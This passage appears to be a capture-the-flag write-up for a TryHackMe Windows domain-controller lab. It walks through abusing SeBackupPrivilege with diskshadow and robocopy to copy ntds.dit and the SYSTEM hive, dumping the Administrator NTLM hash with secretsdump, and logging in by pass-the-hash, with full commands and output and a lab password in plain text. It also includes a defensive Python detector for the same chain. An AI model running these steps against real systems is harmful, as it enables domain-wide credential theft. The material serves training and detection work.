Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\lvetrova\Documents> cd ../
*Evil-WinRM* PS C:\Users\lvetrova> $credential = Import-CliXml -Path lvetrova.xml
*Evil-WinRM* PS C:\Users\lvetrova> $credential.GetNetworkCredential().Password
[REDACTED]
*Evil-WinRM* PS C:\Users\lvetrova>

Privilege Escalation

We go back and log in with evil-winrm as the user xyan1d3. Then we run whoami /priv to list the privileges of this user.

geobour98@kali:~$ evil-winrm -i 10.10.43.148 -u xyan1d3 -p cyanide9amine5628                                                            
                                                                                                                         
Evil-WinRM shell v3.4                                                                                                    
                                                                                                                         
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                                                                                                         
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion    
                                                                                                                         
Info: Establishing connection to remote endpoint                                                                         
                                                                                                                         
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

The most interesting privileges are SeBackupPrivilege and SeRestorePrivilege.

We can follow the first method from this article: Windows PrivEsc with SeBackupPrivilege (disk shadow, robocopy).

First, create a file back_script.txt with the following contents. The trailing X on each line is deliberate: diskshadow ignores the last character of each line when it reads a script file, so the commands are echoed back without it.

set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

Then, in the evil-winrm session, upload the file back_script.txt.

  • Command: upload back_script.txt
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> upload back_script.txt
Info: Uploading back_script.txt to C:\Users\xyan1d3\Documents\back_script.txt                                            
                                                                                                                         
                                                                                                                         
Data: 252 bytes of 252 bytes copied                                                                                      
                                                                                                                         
Info: Upload successful!                                                                                                 
                                                                                                                         
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> dir                                                                          


    Directory: C:\Users\xyan1d3\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/15/2022  12:21 PM            191 back_script.txt

Then, pass the script to diskshadow utility to create the shadow copy.

  • Command: diskshadow /s back_script.txt
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> diskshadow /s back_script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  HAVEN-DC,  11/15/2022 12:21:27 PM

-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,
because it requires volume  which is not in the shadow copy set.
The writer "ASR Writer" is now entirely excluded from the backup because the top-level
non selectable component "\BCD\BCD" is excluded.

* Including writer "Task Scheduler Writer":
        + Adding component: \TasksStore

* Including writer "VSS Metadata Store Writer":
        + Adding component: \WriterMetadataStore
<snip>
Number of shadow copies listed: 1
-> expose %cdrive% E:
-> %cdrive% = {8751d494-c204-48ad-b15d-d9269228cb83}
The shadow copy was successfully exposed as E:\.
-> end backup
->
*Evil-WinRM* PS C:\Users\xyan1d3\Documents>

Then verify the contents of the E drive.

*Evil-WinRM* PS C:\Users\xyan1d3\Documents> cd ../../..
*Evil-WinRM* PS C:\> mkdir temp
*Evil-WinRM* PS C:\> cd temp
*Evil-WinRM* PS C:\temp> dir E:


    Directory: E:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/21/2021   9:39 AM                PerfLogs
d-r---        5/21/2021  11:41 AM                Program Files
d-----        2/23/2021   6:21 AM                Program Files (x86)
d-r---        2/25/2021  10:18 AM                Users
d-----        5/21/2021  11:46 AM                Windows


*Evil-WinRM* PS C:\temp>

After that, copy the NTDS file (the Active Directory database) from the exposed shadow copy to the temp folder we created on the C: drive, using Robocopy in backup mode (/b), which is the mode SeBackupPrivilege unlocks.

  • Command: robocopy /b E:\Windows\ntds . ntds.dit
*Evil-WinRM* PS C:\temp> robocopy /b E:\Windows\ntds . ntds.dit                                                          
                                                                                                                         
-------------------------------------------------------------------------------                                          
   ROBOCOPY     ::     Robust File Copy for Windows                                                                      
-------------------------------------------------------------------------------                                          
                                                                                                                         
  Started : Tuesday, November 15, 2022 12:25:47 PM                                                                       
   Source : E:\Windows\ntds\                                                                                             
     Dest : C:\temp\                                                                                                     
                                                                                                                         
    Files : ntds.dit                                                                                                     
                                                                                                                         
  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30                                                                      
                                                                                                                         
------------------------------------------------------------------------------                                           
                                                                                                                         
                           1    E:\Windows\ntds\                                                                         
            New File              16.0 m        ntds.dit
  0.0%
  0.3%
<snip>

Next, save the SYSTEM registry hive, which holds the boot key needed to decrypt the password hashes in the NTDS file, with the reg save command, and verify that both ntds.dit and system.bak are present in C:\temp.

  • Command: reg save hklm\system C:\temp\system.bak
*Evil-WinRM* PS C:\temp> reg save hklm\system C:\temp\system.bak                                                         
The operation completed successfully.                                                                                    
                                                                                                                         
*Evil-WinRM* PS C:\temp> dir                                                                                             
                                                                                                                         
                                                                                                                         
    Directory: C:\temp                                                                                                   
                                                                                                                         
                                                                                                                         
Mode                LastWriteTime         Length Name                                                                    
----                -------------         ------ ----                                                                    
-a----       11/15/2022  12:22 PM       16777216 ntds.dit                                                                
-a----       11/15/2022  12:26 PM       17219584 system.bak                                                              
                                                                                                                         
                                                                                                                         
*Evil-WinRM* PS C:\temp>

Now, we can download these files.

  • Command: download C:\temp\ntds.dit /home/geobour98/ntds.dit
  • Command: download C:\temp\system.bak /home/geobour98/system.bak
*Evil-WinRM* PS C:\temp> download C:\temp\ntds.dit /home/geobour98/ntds.dit
Info: Downloading C:\temp\ntds.dit to /home/geobour98/ntds.dit

                                                             
Info: Download successful!

*Evil-WinRM* PS C:\temp> download C:\temp\system.bak /home/geobour98/system.bak

                                                             
Info: Download successful!

Now we can extract the Administrator's NTLM hash from the two files with secretsdump.py and use it to log in with evil-winrm via pass-the-hash.

  • Command: sudo /opt/impacket/examples/secretsdump.py -system system.bak -ntds ntds.dit LOCAL > hashes1.txt
geobour98@kali:~$ sudo /opt/impacket/examples/secretsdump.py -system system.bak -ntds ntds.dit LOCAL > hashes1.txt
geobour98@kali:~$ cat hashes1.txt
<snip>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9689931bed40ca5a2ce1218210177f0c:::
<snip>
geobour98@kali:~$ evil-winrm -i 10.10.43.148 -u Administrator -H 9689931bed40ca5a2ce1218210177f0c                                               
                                                                                                                                  
Evil-WinRM shell v3.4                                                                                                             
                                                                                                                                  
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                                                                                                                  
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion             
                                                                                                                                  
Info: Establishing connection to remote endpoint                                                                                  
                                                                                                                                  
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
raz0rblack\administrator
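From the defender's side, the chain above leaves a distinctive trail in process-creation telemetry. As an added example (not part of the original writeup), the following Python script runs over a constructed set of Windows Security 4688 events with command-line auditing enabled and flags an account that reproduces the steps shown here: diskshadow driven by a script file, a backup-mode robocopy of ntds.dit, and a reg save of the SYSTEM hive. The field names follow the 4688 event schema; the event values themselves are made up for the example.

```python
import re
from collections import defaultdict

# Constructed sample of Security 4688 (process creation) events, reduced to
# the three fields the detection needs. Three events mirror the steps on this
# page; the fourth is a legitimate backup job that must not be flagged.
SAMPLE_EVENTS = [
    {"SubjectUserName": "xyan1d3", "NewProcessName": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow /s back_script.txt"},
    {"SubjectUserName": "xyan1d3", "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy /b E:\Windows\ntds . ntds.dit"},
    {"SubjectUserName": "xyan1d3", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\system C:\temp\system.bak"},
    {"SubjectUserName": "backupsvc", "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy /b D:\Shares E:\Backup\Shares /e"},
]

# Each rule is (name, regex over the command line). Together they cover
# shadow-copy creation from a script, a backup-mode copy touching the AD
# database path, and export of the SYSTEM hive that holds the boot key.
RULES = [
    ("diskshadow_script", re.compile(r"\bdiskshadow(\.exe)?\s+(/|-)s\b", re.I)),
    ("backup_copy_ntds", re.compile(r"\brobocopy(\.exe)?\b.*\s/b\b.*\bntds", re.I)),
    ("reg_save_system", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I)),
]


def match_rules(event):
    """Return the names of the rules an event's command line triggers."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in RULES if rx.search(cmd)]


def analyze(events):
    """Group rule hits per account. An account that trips two or more
    distinct rules is reproducing the SeBackupPrivilege-to-NTDS chain and
    is returned with the sorted list of steps observed."""
    hits = defaultdict(set)
    for ev in events:
        for name in match_rules(ev):
            hits[ev["SubjectUserName"]].add(name)
    return {user: sorted(names) for user, names in hits.items() if len(names) >= 2}


if __name__ == "__main__":
    for user, steps in analyze(SAMPLE_EVENTS).items():
        print(f"ALERT {user}: {', '.join(steps)}")
```

A single hit (for instance a routine robocopy /b of a file share) is deliberately not alerted on; the signal is the combination of steps under one account.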

Now we can read the file root.xml in C:\Users\Administrator. It is a PowerShell CliXML export of a PSCredential object whose Password field holds a hex-encoded string; decoding that string reveals the root flag.

*Evil-WinRM* PS C:\Users\Administrator> type root.xml            
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">                                                  
  <Obj RefId="0">               
    <TN RefId="0">              
      <T>System.Management.Automation.PSCredential</T>           
      <T>System.Object</T>      
    </TN>                       
    <ToString>System.Management.Automation.PSCredential</ToString>                                                                
    <Props>                     
      <S N="UserName">Administrator</S>                          
      <SS N="Password">44616d6e20796f752061726520612067656e6975732e0a4275742c20492061706f6c6f67697a6520666f72206368656174696e6720796f75206c696b6520746869732e0a0a4865726520697320796f757220526f6f7420466c61670a54484d7b316234663436636334666261343633343832373364313086463393164613230647d0a0a546167206d65206f6e2068747470733a2f2f747769747465722e636f6d2f5879616e3164332061626f75742077686174207061727420796f7520656e6a6f796564206f6e207468697320626f7820616e642077686174207061727420796f75207374727567676c656420776974682e0a0a496620796f7520656e6a6f796564207468697320626f7820796f75206d617920616c736f2074616b652061206c6f6f6b20617420746865206c696e75786167656e637920726f6f6d20696e207472796861636b6d652e0a576869636820636f6e7461696e7320736f6d65206c696e75782066756e64616d656e74616c7320616e642070726976696c65676520657363616c6174696f6e2068747470733a2f2f7472796861636b6d652e636f6d2f726f6f6d2f6c696e75786167656e63792e0a</SS>
  </Obj>                        
</Objs>                         
*Evil-WinRM* PS C:\Users\Administrator>
geobour98@kali:~$ echo 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 | xxd -r -p                   
Damn you are a genius.                                           
But, I apologize for cheating you like this.                                                                                      

Here is your Root Flag                                           
[REDACTED]                            

Tag me on https://twitter.com/Xyan1d3 about what part you enjoyed on this box and what part you struggled with.

If you enjoyed this box you may also take a look at the linuxagency room in tryhackme.
Which contains some linux fundamentals and privilege escalation https://tryhackme.com/room/linuxagency.

Proof of Concept (PoC image)

This post is licensed under CC BY 4.0 by the author.